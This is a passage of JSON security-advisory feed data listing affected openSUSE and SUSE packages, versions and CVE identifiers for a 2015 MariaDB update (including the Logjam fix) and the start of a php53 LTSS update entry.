"packageFilename": "mariadb-debugsource-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-bench-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-bench-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-5.5.44-4.1.i586.rpm", "packageName": "mariadb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-tools-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqlclient_r18-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqlclient_r18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-bench-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-bench", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-bench-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-bench", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-debuginfo-32bit-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient18-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-bench-5.5.44-4.1.i586.rpm", "packageName": "mariadb-bench", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient_r18-32bit-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient_r18-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-tools-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-bench-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "mariadb-bench-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-debuginfo-32bit-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient18-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqld18-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqld18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-bench-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-bench-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-tools-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-client-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-test-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqld18-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqld18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-errormessages-5.5.44-4.1.i586.rpm", "packageName": "mariadb-errormessages", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqld-devel-5.5.44-4.1.i586.rpm", "packageName": "libmysqld-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-client-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-test-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "libmysqlclient18-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "libmysqlclient18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-debugsource-5.5.44-4.1.i586.rpm", "packageName": "mariadb-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-client-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-client", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "libmysqlclient_r18-5.5.44-4.1.x86_64.rpm", "packageName": "libmysqlclient_r18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-debugsource-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-test-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-test-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqlclient-devel-5.5.44-4.1.i586.rpm", "packageName": "libmysqlclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqld18-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "libmysqld18-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "x86_64", "packageFilename": "mariadb-test-debuginfo-10.0.20-2.9.1.x86_64.rpm", "packageName": "mariadb-test-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-client-debuginfo-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "x86_64", "packageFilename": "mariadb-test-5.5.44-4.1.x86_64.rpm", "packageName": "mariadb-test", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "mariadb-debuginfo-5.5.44-4.1.i586.rpm", "packageName": "mariadb-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqlclient_r18-5.5.44-4.1.i586.rpm", "packageName": "libmysqlclient_r18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "mariadb-tools-debuginfo-10.0.20-2.9.1.i586.rpm", "packageName": "mariadb-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "10.0.20-2.9.1", "arch": "i586", "packageFilename": "libmysqlclient18-10.0.20-2.9.1.i586.rpm", "packageName": "libmysqlclient18", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "5.5.44-4.1", "arch": "i586", "packageFilename": "libmysqlclient18-5.5.44-4.1.i586.rpm", "packageName": "libmysqlclient18", "operator": "lt"}], "description": "MariaDB was updated to its current minor version, fixing bugs and security\n issues.\n\n These updates include a fix for Logjam (CVE-2015-4000), making MariaDB\n work with client software that no longer allows short DH groups over SSL,\n as e.g.\n our current openssl packages.\n\n On openSUSE 13.1, MariaDB was updated to 5.5.44.\n\n On openSUSE 13.2, MariaDB was updated from 10.0.13 to 10.0.20.\n\n Please read the release notes of MariaDB\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10020-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10020-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10019-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10019-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10018-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10018-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10017-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10017-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10016-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10016-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10015-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10015-release-notes/</a>\n <a rel=\"nofollow\" href=\"https://mariadb.com/kb/en/mariadb/mariadb-10014-release-notes/\">https://mariadb.com/kb/en/mariadb/mariadb-10014-release-notes/</a> for more\n information.\n\n", "edition": 1, "reporter": "Suse", "published": "2015-07-09T17:08:05", "title": "Security update for MariaDB (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4000", "CVE-2014-6500", "CVE-2015-2325", "CVE-2015-2568", "CVE-2014-6507", "CVE-2014-6469", "CVE-2015-0501", "CVE-2015-0432", "CVE-2014-6496", "CVE-2014-6555", "CVE-2015-2571", "CVE-2014-6559", "CVE-2014-8964", "CVE-2014-6464", "CVE-2015-3152", "CVE-2015-0382", "CVE-2015-0374", "CVE-2014-6491", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2014-6568", "CVE-2015-0505", "CVE-2015-2573", "CVE-2014-6494", "CVE-2015-2326", "CVE-2015-0411", "CVE-2015-0381"], "modified": "2015-07-09T17:08:05", "id": "OPENSUSE-SU-2015:1216-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00020.html", "cvss": {"score": 8.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "references": ["https://bugzilla.suse.com/981050", "https://bugzilla.suse.com/885961", "https://bugzilla.suse.com/931776", "https://bugzilla.suse.com/935227", "https://bugzilla.suse.com/884989", "https://bugzilla.suse.com/893849", "https://bugzilla.suse.com/886059", "https://bugzilla.suse.com/977003", "https://bugzilla.suse.com/978827", "https://bugzilla.suse.com/935234", "https://bugzilla.suse.com/942296", "https://bugzilla.suse.com/935232", "https://bugzilla.suse.com/942291", "https://bugzilla.suse.com/917150", "https://bugzilla.suse.com/980373", "https://bugzilla.suse.com/935274", "https://bugzilla.suse.com/923945", "https://bugzilla.suse.com/935226", "https://bugzilla.suse.com/924972", "https://bugzilla.suse.com/973792", "https://bugzilla.suse.com/884987", "https://bugzilla.suse.com/884992", "https://bugzilla.suse.com/978829", "https://bugzilla.suse.com/931421", "https://bugzilla.suse.com/977994", "https://bugzilla.suse.com/884991", "https://bugzilla.suse.com/976997", "https://bugzilla.suse.com/977005", "https://bugzilla.suse.com/978830", "https://bugzilla.suse.com/884990", "https://bugzilla.suse.com/982012", "https://bugzilla.suse.com/925109", "https://bugzilla.suse.com/980366", "https://bugzilla.suse.com/935224", "https://bugzilla.suse.com/884986", "https://bugzilla.suse.com/982162", "https://bugzilla.suse.com/902357", "https://bugzilla.suse.com/969821", "https://bugzilla.suse.com/910659", "https://bugzilla.suse.com/945412", "https://bugzilla.suse.com/938721", "https://bugzilla.suse.com/902368", "https://bugzilla.suse.com/945428", "https://bugzilla.suse.com/982010", "https://bugzilla.suse.com/928511", "https://bugzilla.suse.com/980375", "https://bugzilla.suse.com/982013", "https://bugzilla.suse.com/893853", "https://bugzilla.suse.com/931769", "https://bugzilla.suse.com/921950", "https://bugzilla.suse.com/971611", "https://bugzilla.suse.com/938719", "https://bugzilla.suse.com/922452", "https://bugzilla.suse.com/931772", "https://bugzilla.suse.com/978828", "https://bugzilla.suse.com/935275", "https://bugzilla.suse.com/977991", "https://bugzilla.suse.com/928506", "https://bugzilla.suse.com/935229", "https://bugzilla.suse.com/919080", "https://bugzilla.suse.com/935074", "https://bugzilla.suse.com/976996", "https://bugzilla.suse.com/914690", "https://bugzilla.suse.com/922451", "https://bugzilla.suse.com/973351", "https://bugzilla.suse.com/902360", "https://bugzilla.suse.com/918768", "https://bugzilla.suse.com/982011", "https://bugzilla.suse.com/971912", "https://bugzilla.suse.com/886060", "https://bugzilla.suse.com/933227", "https://bugzilla.suse.com/949961", "https://bugzilla.suse.com/968284", "https://bugzilla.suse.com/971612"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pcntl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.i586.rpm", "packageName": "php53-ldap", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.x86_64.rpm", "packageName": "php53-exif", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gd", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gmp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.i586.rpm", "packageName": "php53-tokenizer", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.s390x.rpm", "packageName": "php53-mbstring", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.i586.rpm", "packageName": "php53", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.x86_64.rpm", "packageName": "php53-bcmath", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.s390x.rpm", "packageName": "php53-ldap", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.i586.rpm", "packageName": "php53-wddx", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.s390x.rpm", "packageName": "php53-json", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.x86_64.rpm", "packageName": "php53-zip", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlwriter", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.s390x.rpm", "packageName": "php53-shmop", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.i586.rpm", "packageName": "php53-mcrypt", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvshm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.i586.rpm", "packageName": "php53-intl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.s390x.rpm", "packageName": "php53-pspell", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.s390x.rpm", "packageName": "php53-calendar", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.i586.rpm", "packageName": "php53-bz2", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.i586.rpm", "packageName": "php53-odbc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.i586.rpm", "packageName": "php53-iconv", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvsem", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvmsg", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.s390x.rpm", "packageName": "php53-pear", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.x86_64.rpm", "packageName": "php53", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.i586.rpm", "packageName": "php53-ftp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ftp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.i586.rpm", "packageName": "php53-ctype", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.s390x.rpm", "packageName": "php53-gd", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.s390x.rpm", "packageName": "php53-odbc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.x86_64.rpm", "packageName": "php53-soap", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.i586.rpm", "packageName": "php53-mysql", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-intl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.x86_64.rpm", "packageName": "php53-json", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.x86_64.rpm", "packageName": "php53-snmp", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvsem", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.x86_64.rpm", "packageName": "php53-gettext", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.s390x.rpm", "packageName": "php53-dba", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.s390x.rpm", "packageName": "php53-soap", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pspell", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.s390x.rpm", "packageName": "php53-xsl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mcrypt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.i586.rpm", "packageName": "php53-zlib", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.i586.rpm", "packageName": "php53-fastcgi", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvshm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.s390x.rpm", "packageName": "php53-dom", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.s390x.rpm", "packageName": "php53-suhosin", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.i586.rpm", "packageName": "php53-exif", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.s390x.rpm", "packageName": "php53-bcmath", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-soap-5.3.17-47.1.i586.rpm", "packageName": "php53-soap", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.x86_64.rpm", "packageName": "php53-dba", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.s390x.rpm", "packageName": "php53-ctype", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.i586.rpm", "packageName": "apache2-mod_php53", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.s390x.rpm", "packageName": "php53-fastcgi", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.i586.rpm", "packageName": "php53-suhosin", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.x86_64.rpm", "packageName": "php53-iconv", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gd-5.3.17-47.1.i586.rpm", "packageName": "php53-gd", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.i586.rpm", "packageName": "php53-dom", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pdo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.s390x.rpm", 